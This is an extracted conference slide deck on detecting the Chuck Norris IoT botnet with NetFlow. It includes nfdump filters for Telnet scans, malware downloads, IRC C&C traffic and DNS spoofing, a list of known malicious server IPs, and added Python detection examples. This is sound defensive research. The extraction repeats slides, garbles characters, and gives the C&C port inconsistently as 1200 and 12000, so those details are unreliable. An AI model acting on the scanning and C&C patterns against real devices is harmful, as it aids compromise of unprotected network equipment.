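The addresses above are the data the filters on the previous slides are parameterized with. The following block, added here as an example and not the plugin's own Perl backend, fills the footnoted placeholders (web_servers¹, IRC_server², the OpenDNS and spoofed DNS lists) from that table and builds the nfdump command an NfSen backend would run for one 5-minute slot. It assumes nfdump 1.6 syntax (`dst ip in [ ... ]` address lists, `-r`, `-q`, `-o csv`), a flat profile/source/nfcapd.<slot> file layout that simplifies NfSen's profile directories, the local network 147.251.0.0/16 and the 12000 IRC port from this slide.

```python
"""Added example, not the plugin's Perl backend: fill the slides' filter placeholders from the
published server list and build the nfdump command an NfSen backend runs for one 5-minute slot.
nfdump 1.6 syntax is assumed (`ip in [ ... ]` lists, `-r`, `-q`, `-o csv`); the flat
<profile>/<source>/nfcapd.<slot> layout is a simplification of NfSen's profile directories."""
from datetime import datetime

# Slide "Detected Chuck Norris Servers", kept as data: an update published on the project
# page changes this table, not the detection code.
KNOWN_SERVERS = {
    "web_servers": ["87.98.173.190", "87.98.163.86"],
    "irc_servers": ["87.98.173.190", "87.98.163.86"],
    "irc_port": 12000,
    "opendns": ["208.67.222.222", "208.67.220.220"],
    "spoofed_dns": ["87.98.163.86"],
}

def dst_ip_list(ips):
    """nfdump list syntax; a single address still becomes a list so every template looks alike."""
    return "dst ip in [ " + " ".join(ips) + " ]"

def build_filters(local_net, servers=KNOWN_SERVERS):
    """The four flow-based methods with web_servers, IRC_server and the DNS placeholders filled in."""
    return {
        "telnet_scan": (f"(net {local_net}) and (dst port 23) and (proto TCP) and "
                        "((flags S and not flags ARPUF) or (flags SR and not flags APUF))"),
        "distribution_site": (f"(src net {local_net}) and ({dst_ip_list(servers['web_servers'])}) "
                              "and (dst port 80) and (proto TCP) and (flags SA and not flags R)"),
        "irc_cc": (f"(src net {local_net}) and ({dst_ip_list(servers['irc_servers'])}) "
                   f"and (dst port {servers['irc_port']}) and (proto TCP) and (flags SA and not flags R)"),
        "dns_spoof": (f"(src net {local_net}) and "
                      f"({dst_ip_list(servers['opendns'] + servers['spoofed_dns'])}) "
                      "and (proto UDP) and (dst port 53)"),
    }

def nfsen_timeslot(when):
    """NfSen names its 5-minute slots YYYYMMDDhhmm, rounded down to the slot start."""
    start = when.replace(minute=when.minute - when.minute % 5, second=0, microsecond=0)
    return start.strftime("%Y%m%d%H%M")

def nfdump_argv(profile_dir, source, timeslot, filter_expr):
    """One nfdump run over one slot.  The filter is the last positional argument and is passed
    as a single argv element, so no shell quoting is involved (hand the list to subprocess.run)."""
    return ["nfdump", "-r", f"{profile_dir}/{source}/nfcapd.{timeslot}", "-q", "-o", "csv", filter_expr]

def slot_commands(local_net="147.251.0.0/16", when=datetime(2011, 1, 12, 10, 3, 27),
                  profile_dir="/data/nfsen/profiles-data/live", source="edge"):
    """Commands the backend would issue for the slot containing `when` (paths are assumptions)."""
    slot = nfsen_timeslot(when)
    return {name: nfdump_argv(profile_dir, source, slot, expr)
            for name, expr in build_filters(local_net).items()}

if __name__ == "__main__":
    for name, argv in slot_commands().items():
        print(name, argv)
```

Keeping the server list as data rather than baking it into the filter strings is what makes the "IP address updates are published on the project page" workflow cheap: a new list is a configuration change, and every filter is regenerated from it on the next slot.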
Part IV
NfSen Botnet Detection Plugin
Botnet Detection Plugin
Plugin Features
  Detects Chuck Norris-like botnet behavior
  Based on NetFlow and other network data sources
  Processes data regularly and provides real-time output
Plugin Architecture
  Compliant with the NfSen plugin architecture recommendations
  PHP frontend with a Perl backend and a PostgreSQL database
  Web, e-mail and syslog detection output and reporting
Plugin Architecture
[Diagram: BACKEND – cndet.pm (detection logic) and cndetdb.pm (database access), reading NetFlow data, DNS and the WHOIS database and storing results in PostgreSQL; FRONTEND – cndet.php, which talks to the backend through the nfsend communication interface.]
Plugin Methods Architecture
[Diagram: cndetdb.pm drives the five detection methods – Telnet scan detection, botnet distribution sites detection, botnet C&C centers detection, DNS spoofing attack detection and ADSL string detection – over NetFlow data, DNS and the WHOIS database, with results kept in PostgreSQL.]
Web Interface – Infected Host Detected
Part V
Conclusion
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
  Scanning for possible bots
  Infection of a vulnerable device
  Bot initialization / update
  Botnet operation
Botnet Detection Plugin Customization
  Modular plugin engine
  Easy modification for detection of other botnets
  Detecting another botnet requires customizing the detection methods
  Plugin distributed under the BSD license
Conclusion
Network Devices Are Not Protected
  Routers, access points, printers, cameras, TVs, ...
  No AV software, missing patches and firmware updates
  But they should be protected
Experience
  NetFlow can monitor all such devices in the network
  Discovery of the new Chuck Norris botnet using NetFlow
  Developed a specialized NfSen plugin for Chuck Norris botnet detection
Future
  Chuck Norris is down, but others are coming (e.g. Stuxnet)
  We are open to research collaboration
  The detection plugin is available at our project site
Thank You For Your Attention
Vojtěch Krmíček, Tomáš Plesník
vojtec|plesnik@ics.muni.cz
Project CYBER: http://www.muni.cz/ics/cyber
Detecting Botnets with NetFlow
This material is based upon work supported by the Czech Ministry of Defence under Contract No. OVMASUN200801
Detection Methods Overview
Five Detection Methods
Telnet scan detectionConnections to botnet distribution sites detectionConnections to botnet CampC centers detectionDNS spoofing attack detectionADSL string detection
Methods Correspond to Botnet Lifecycle
Applied to NetFlow Data
Defined as NFDUMP filtersImplemented to NfSen collector
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 13 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
NFDUMP detection filter
(net local_network) and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
NFDUMP detection filter(net local_network)
and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
NFDUMP detection filter(net local_network)
and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP)
and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
1961428x
2141283x
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP)
and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
1961428x
2141283x
SYNRESET flags
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP) and
((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
NFDUMP detection filter(src net local_network) and (dst ip web_servers1)
and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP)
and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2)
and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP)
and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
NFDUMP detection filter
(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or
(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4))
and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
UDP53
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
ADSL String Detection
Looking for ADSL String
ADSL string indicates Chuck Norris botnetSearching in victimrsquos hostname or victimrsquos WHOISQuering DNS server and parsing recieved hostnameQuering WHOIS database and parsing recieved info
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 18 28
+
13131313
$amp()+--amp130+(amp0(131$2 13133+13133++ampamp45(331+605+70138913$13+-
amp3133+913($2-+(-amp3 lt$$2 2=gtlt$$21313913$+7013+-
1313130 $ 0$1
adsl
196192572
Detected Chuck Norris Servers
Known IP Addresses
Web server addresses 8798173190 879816386IRC server addresses 8798173190 879816386IRC server port 12000OpenDNS server addresses 2086722222220867220220Spoofed DNS server 879816386
This data is used in detection methods by default
IP addresses updates are published at project page
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 19 28
Part IV
NfSen Botnet Detection Plugin
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 20 28
Botnet Detection Plugin
Plugin Features
Detects Chuck Norris-like botnet behaviorBased on NetFlow and other network data sourcesProcesses data regularly and provides real-time output
Plugin Architecture
Compliant with NfSen plugins architecture recommendationsPHP frontend with a Perl backend and a PostgreSQL DBWeb e-mail and syslog detection output and reporting
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 21 28
Plugin Architecture
[Diagram]
BACKEND: cndet.pm (detection backend) and cndetdb.pm (database layer); inputs: NetFlow data, DNS, WHOIS db; storage: PostgreSQL
FRONTEND: cndet.php (web frontend)
Backend and frontend communicate through the nfsend comm interface.
Plugin Methods Architecture
[Diagram: cndetdb.pm with PostgreSQL storage; data sources: NetFlow data, DNS, WHOIS db; detection methods below]
- Telnet scan detection
- Botnet distribution sites detection
- Botnet C&C centers detection
- DNS spoofing attack detection
- ADSL string detection
Web Interface – Infected Host Detected
[Screenshot of the plugin web interface; not preserved in extraction]
Part V
Conclusion
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
- scanning for possible bots
- infection of a vulnerable device
- bot initialization/update
- botnet operation
Botnet Detection Plugin Customization
- modular plugin engine
- easy modification for detection of other botnets
- we need to customize the detection methods
- plugin distributed under the BSD license
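What "modular plugin engine" and "customize detection methods" amount to, as an added example that is not code from the cndet plugin: each lifecycle phase from the slide is one registered method that carries the nfdump filter the backend would run and an equivalent Python predicate for offline evaluation, the engine correlates hits per local host across phases, and a method for another botnet is added to the registry without touching the engine. Ports and TCP flag letters follow the Telnet-scan, distribution-site and C&C filters shown in the deck; the local network and server addresses (192.168.0.0/16, 203.0.113.x) are constructed placeholders.

```python
"""A modular detection engine in the spirit of the slide's 'Botnet Detection
Plugin Customization': every lifecycle phase is one pluggable method that
carries the nfdump filter the backend would run plus an equivalent Python
predicate, and per-host correlation across phases yields the verdict.

Added example, not code from the cndet plugin. Ports and flag letters follow
the Telnet-scan (TCP/23, SYN or SYN+RST), distribution-site (TCP/80) and C&C
(TCP/1200) filters in the deck; all addresses are constructed placeholders."""
import ipaddress
from collections import defaultdict
from dataclasses import dataclass
from typing import Callable, List

LOCAL_NET = ipaddress.ip_network("192.168.0.0/16")     # constructed
DIST_WEB_SERVERS = {"203.0.113.10", "203.0.113.11"}     # placeholder for web_servers
CC_IRC_SERVER = "203.0.113.10"                          # placeholder for IRC_server
CC_PORT = 1200


@dataclass
class Method:
    phase: str                         # lifecycle phase the method covers
    name: str
    nfdump_filter: str                 # what the backend would hand to nfdump
    predicate: Callable[[dict], bool]  # same test, for offline evaluation


def is_local(ip):
    return ipaddress.ip_address(ip) in LOCAL_NET


def has_flags(flow, wanted, forbidden=""):
    """nfdump semantics: 'flags S and not flags ARPUF' = S set, none of A,R,P,U,F set."""
    present = set(flow["flags"])
    return set(wanted) <= present and not (set(forbidden) & present)


def telnet_scan(flow):
    return ((is_local(flow["src"]) or is_local(flow["dst"]))
            and flow["proto"] == "TCP" and flow["dport"] == 23
            and (has_flags(flow, "S", "ARPUF") or has_flags(flow, "SR", "APUF")))


def distribution_download(flow):
    return (is_local(flow["src"]) and flow["dst"] in DIST_WEB_SERVERS
            and flow["proto"] == "TCP" and flow["dport"] == 80 and has_flags(flow, "SA", "R"))


def cc_connection(flow):
    return (is_local(flow["src"]) and flow["dst"] == CC_IRC_SERVER
            and flow["proto"] == "TCP" and flow["dport"] == CC_PORT and has_flags(flow, "SA", "R"))


REGISTRY: List[Method] = [
    Method("scanning", "telnet_scan",
           "(net local_network) and (dst port 23) and (proto TCP) and "
           "((flags S and not flags ARPUF) or (flags SR and not flags APUF))", telnet_scan),
    Method("infection", "distribution_site",
           "(src net local_network) and (dst ip web_servers) and (dst port 80) and "
           "(proto TCP) and (flags SA and not flag R)", distribution_download),
    Method("operation", "cc_center",
           "(src net local_network) and (dst ip IRC_server) and (dst port 1200) and "
           "(proto TCP) and (flags SA and not flag R)", cc_connection),
]


def run_engine(flows, registry=REGISTRY):
    """Return {local host: {phase: hit count}}; the local side of each flow is the
    host of interest. Adding a Method to the registry is the only change needed
    to cover another botnet."""
    hits = defaultdict(lambda: defaultdict(int))
    for flow in flows:
        for method in registry:
            if method.predicate(flow):
                host = flow["src"] if is_local(flow["src"]) else flow["dst"]
                hits[host][method.phase] += 1
    return {host: dict(phases) for host, phases in hits.items()}


def verdicts(hit_table, min_phases=2):
    """'infected' when a host shows at least min_phases distinct lifecycle phases."""
    return {host: ("infected" if len(phases) >= min_phases else "suspicious")
            for host, phases in hit_table.items()}


def syslog_line(host, verdict, phases):
    # constructed output format; the 'cndet' tag mirrors the plugin's module name on the deck
    return f"cndet: host={host} verdict={verdict} phases={','.join(sorted(phases))}"


SAMPLE_FLOWS = [  # constructed flow records
    {"src": "192.168.1.20", "dst": "203.0.113.10", "proto": "TCP", "dport": 80,   "flags": "SA"},
    {"src": "192.168.1.20", "dst": "203.0.113.10", "proto": "TCP", "dport": 1200, "flags": "SAP"},
    {"src": "192.168.1.20", "dst": "203.0.113.50", "proto": "TCP", "dport": 23,   "flags": "S"},
    {"src": "192.168.1.20", "dst": "203.0.113.51", "proto": "TCP", "dport": 23,   "flags": "SR"},
    {"src": "203.0.113.60", "dst": "192.168.1.33", "proto": "TCP", "dport": 23,   "flags": "S"},    # inbound scan
    {"src": "192.168.1.44", "dst": "203.0.113.10", "proto": "TCP", "dport": 80,   "flags": "SAR"},  # reset, excluded
]

if __name__ == "__main__":
    table = run_engine(SAMPLE_FLOWS)
    for host, verdict in verdicts(table).items():
        print(syslog_line(host, verdict, table[host]))
```

Correlating phases per host is what turns three individually noisy filters into a usable verdict: a single inbound Telnet SYN says little about the target, whereas a local device that scans, fetches from a distribution site and then holds a C&C session has walked the lifecycle the slide describes.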
Conclusion
Network Devices Are Not Protected
- Routers, access points, printers, cameras, TVs, ...
- No AV software, missing patches and firmware updates
- But they should be protected
Experience
- NetFlow can monitor all such devices in the network
- Discovery of the new Chuck Norris botnet using NetFlow
- Developed a specialized NfSen plugin for Chuck Norris botnet detection
Future
- Chuck Norris is down but others are coming (e.g. Stuxnet)
- We are open to research collaboration
- Detection plugin is available at our project site
Thank You For Your Attention
Vojtěch Krmíček, Tomáš Plesník
{vojtec|plesnik}@ics.muni.cz
Project CYBER: http://www.muni.cz/ics/cyber
Detecting Botnets with NetFlow
This material is based upon work supported by the Czech Ministry of Defence under Contract No. OVMASUN200801.
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Telnet Scan Detection – Phase I

Incoming and outgoing TCP SYN scans on port 23

(Figure: an infected device inside the local network works through a list of C class networks to scan, e.g. 147.251.3.x, 147.251.18.x, 147.251.20.x, 147.251.4.x and further networks outside the local range, probing TCP/23; the resulting flows carry SYN or SYN+RST flags.)

NFDUMP detection filter:
(net local_network) and (dst port 23) and (proto TCP) and
((flags S and not flags ARPUF) or (flags SR and not flags APUF))

Krmíček, Plesník: Detecting Botnets with NetFlow 14/28
Connections to Botnet Distribution Sites – Phase II

Bot's web download requests from infected host

(Figure: an infected device inside the local network connects on TCP/80 to the botnet distribution web servers; the flows carry SYN+ACK flags and no RST, i.e. the download session was established.)

NFDUMP detection filter:
(src net local_network) and (dst ip web_servers [1]) and (dst port 80) and (proto TCP) and (flags SA and not flags R)

[1] IP addresses of the attacker's botnet distribution web servers
Connections to Botnet C&C Center – Phase III

Bot's IRC traffic with command and control center

(Figure: an infected device inside the local network connects on TCP/12000 to the botnet C&C (IRC) server; the flows carry SYN+ACK flags and no RST.)

NFDUMP detection filter:
(src net local_network) and (dst ip IRC_server [2]) and (dst port 12000) and (proto TCP) and (flags SA and not flags R)

[2] IP address of the attacker's IRC server (botnet C&C center); the port is the IRC server port 12000 listed under Detected Chuck Norris Servers
DNS Spoofing Attack Detection – Phase IV

Attacker's DNS or OpenDNS Queries
Common DNS requests are forwarded to OpenDNS servers
Targeted DNS requests are forwarded to the attacker's spoofed DNS

DNS Queries Outside Local Network
Used for phishing attacks, e.g. Facebook or banking sites

(Figure: an infected device inside the local network sends UDP/53 queries out of the network, to an OpenDNS server and to the spoofed DNS server.)

NFDUMP detection filter:
(src net local_network) and ((dst ip OpenDNS_servers [3]) or (dst ip DNS_servers [4])) and (proto UDP) and (dst port 53)

[3] IP addresses of the common OpenDNS servers
[4] IP addresses of the attacker's spoofed DNS servers
ADSL String Detection

Looking for the ADSL String
The ADSL string indicates the Chuck Norris botnet
Searched in the victim's hostname or the victim's WHOIS record
Querying the DNS server and parsing the received hostname
Querying the WHOIS database and parsing the received info
(Screenshot: reverse DNS / WHOIS lookup output for a scanned address, with the string "adsl" highlighted in the returned hostname.)
Detected Chuck Norris Servers

Known IP Addresses
Web server addresses: 87.98.173.190, 87.98.163.86
IRC server addresses: 87.98.173.190, 87.98.163.86
IRC server port: 12000
OpenDNS server addresses: 208.67.222.222, 208.67.220.220
Spoofed DNS server: 87.98.163.86

This data is used in the detection methods by default
IP address updates are published on the project page
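The five detection methods above (Phases I–IV plus the ADSL string check) are given on the slides as NFDUMP filters and a server list. The following is an added example, not code from the slides or from the NfSen plugin: it re-expresses the filters as functions over nfdump-style flow records, runs them on constructed sample flows and correlates the phases per host the way the plugin's web interface reports an infected host. The server addresses and ports are the slide's "Known IP Addresses" defaults; the local prefix 147.251.0.0/16, the scan threshold of 20 distinct targets, the infection rule in classify() and the sample flows are assumptions. Two caveats the filters alone do not capture: a single SYN-only flow is just an unanswered connection attempt, so Phase I only means something once one source hits many distinct TCP/23 targets, and a query to OpenDNS is ordinary for users who configured it, so in Phase IV the spoofed DNS destination is the strong indicator.

```python
# Added example; server defaults from the slide, everything else assumed.
import ipaddress
from collections import defaultdict
from dataclasses import dataclass

DISTRIBUTION_WEB_SERVERS = {"87.98.173.190", "87.98.163.86"}
IRC_SERVERS = {"87.98.173.190", "87.98.163.86"}
IRC_PORT = 12000
OPENDNS_SERVERS = {"208.67.222.222", "208.67.220.220"}
SPOOFED_DNS_SERVERS = {"87.98.163.86"}
LOCAL_NETWORK = ipaddress.ip_network("147.251.0.0/16")  # assumption
SCAN_MIN_TARGETS = 20  # assumption: distinct TCP/23 targets per source


@dataclass(frozen=True)
class Flow:
    src: str
    dst: str
    proto: str  # "TCP" or "UDP"
    dport: int
    flags: str  # nfdump letters A,S,F,R,P,U; "" when none


def parse_flows(text):
    """Parse constructed 'src,dst,proto,dport,flags' lines ('-' = no flags)."""
    flows = []
    for line in text.strip().splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        src, dst, proto, dport, flags = (f.strip() for f in line.split(","))
        flows.append(Flow(src, dst, proto.upper(), int(dport),
                          flags.upper().replace("-", "")))
    return flows


def is_local(ip):
    return ipaddress.ip_address(ip) in LOCAL_NETWORK


def scan_flags(flow):
    """Phase I: exactly SYN, or exactly SYN+RST, i.e. the slide's
    '(flags S and not flags ARPUF) or (flags SR and not flags APUF)'."""
    return set(flow.flags) in ({"S"}, {"S", "R"})


def established_no_reset(flow):
    """Phases II/III: SYN and ACK seen, no RST ('flags SA and not flags R')."""
    return "S" in flow.flags and "A" in flow.flags and "R" not in flow.flags


def telnet_scanners(flows):
    """Phase I: sources with >= SCAN_MIN_TARGETS distinct TCP/23 targets;
    incoming and outgoing scans alike (src or dst inside the local net)."""
    targets = defaultdict(set)
    for f in flows:
        if (f.proto == "TCP" and f.dport == 23 and scan_flags(f)
                and (is_local(f.src) or is_local(f.dst))):
            targets[f.src].add(f.dst)
    return {s: len(t) for s, t in targets.items() if len(t) >= SCAN_MIN_TARGETS}


def distribution_site_hits(flows):
    """Phase II: local hosts with completed TCP/80 sessions to distribution servers."""
    return {f.src for f in flows if is_local(f.src) and f.dst in DISTRIBUTION_WEB_SERVERS
            and f.proto == "TCP" and f.dport == 80 and established_no_reset(f)}


def cnc_hits(flows):
    """Phase III: local hosts with completed TCP sessions to the IRC C&C port."""
    return {f.src for f in flows if is_local(f.src) and f.dst in IRC_SERVERS
            and f.proto == "TCP" and f.dport == IRC_PORT and established_no_reset(f)}


def dns_hits(flows):
    """Phase IV: local hosts querying OpenDNS or the spoofed DNS over UDP/53."""
    hits = defaultdict(set)
    for f in flows:
        if (is_local(f.src) and f.proto == "UDP" and f.dport == 53
                and f.dst in OPENDNS_SERVERS | SPOOFED_DNS_SERVERS):
            hits[f.src].add(f.dst)
    return dict(hits)


def has_adsl_indicator(hostname):
    """ADSL string check on a reverse-DNS name (WHOIS text is searched the same way)."""
    return "adsl" in hostname.lower()


def classify(flows):
    """Correlate the phases per host.  Verdict rule (assumption): infected when
    the host reached the C&C, or both scanned and fetched from a distribution site."""
    phases = defaultdict(set)
    for detector, label in ((telnet_scanners, "telnet_scan"), (distribution_site_hits, "distribution"),
                            (cnc_hits, "cnc"), (dns_hits, "dns_outside")):
        for host in detector(flows):
            phases[host].add(label)
    return {h: {"phases": sorted(p), "infected": "cnc" in p or {"telnet_scan", "distribution"} <= p}
            for h, p in phases.items()}


def sample_flows():
    """Constructed flows: one infected local host, one benign host, one outside scanner."""
    lines = [f"147.251.3.10,147.251.18.{i},TCP,23,S" for i in range(1, 31)]  # outgoing scan
    lines += [f"203.0.113.5,147.251.20.{i},TCP,23,SR" for i in range(1, 26)]  # incoming scan
    lines += ["147.251.3.10,87.98.173.190,TCP,80,SAP",     # bot binary download
              "147.251.3.10,87.98.173.190,TCP,12000,SAP",  # IRC C&C session
              "147.251.3.10,208.67.222.222,UDP,53,-",
              "147.251.3.10,87.98.163.86,UDP,53,-",        # spoofed DNS server
              "147.251.4.20,147.251.4.21,TCP,23,S",        # single admin Telnet attempt
              "147.251.4.20,87.98.173.190,TCP,80,SAR",     # reset, not a download
              "147.251.4.20,208.67.222.222,UDP,53,-"]      # ordinary OpenDNS user
    return parse_flows("\n".join(lines))


if __name__ == "__main__":
    for host, verdict in sorted(classify(sample_flows()).items()):
        print(host, verdict)
```

On the sample data the infected host 147.251.3.10 triggers all four phases, the outside scanner 203.0.113.5 is listed for its incoming scan only, and the benign host 147.251.4.20 shows up solely for its OpenDNS use, which is why a verdict is drawn from the combination of phases rather than from any one filter. Replacing sample_flows() with records exported by `nfdump -o csv` is the only change needed to run it against real data.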
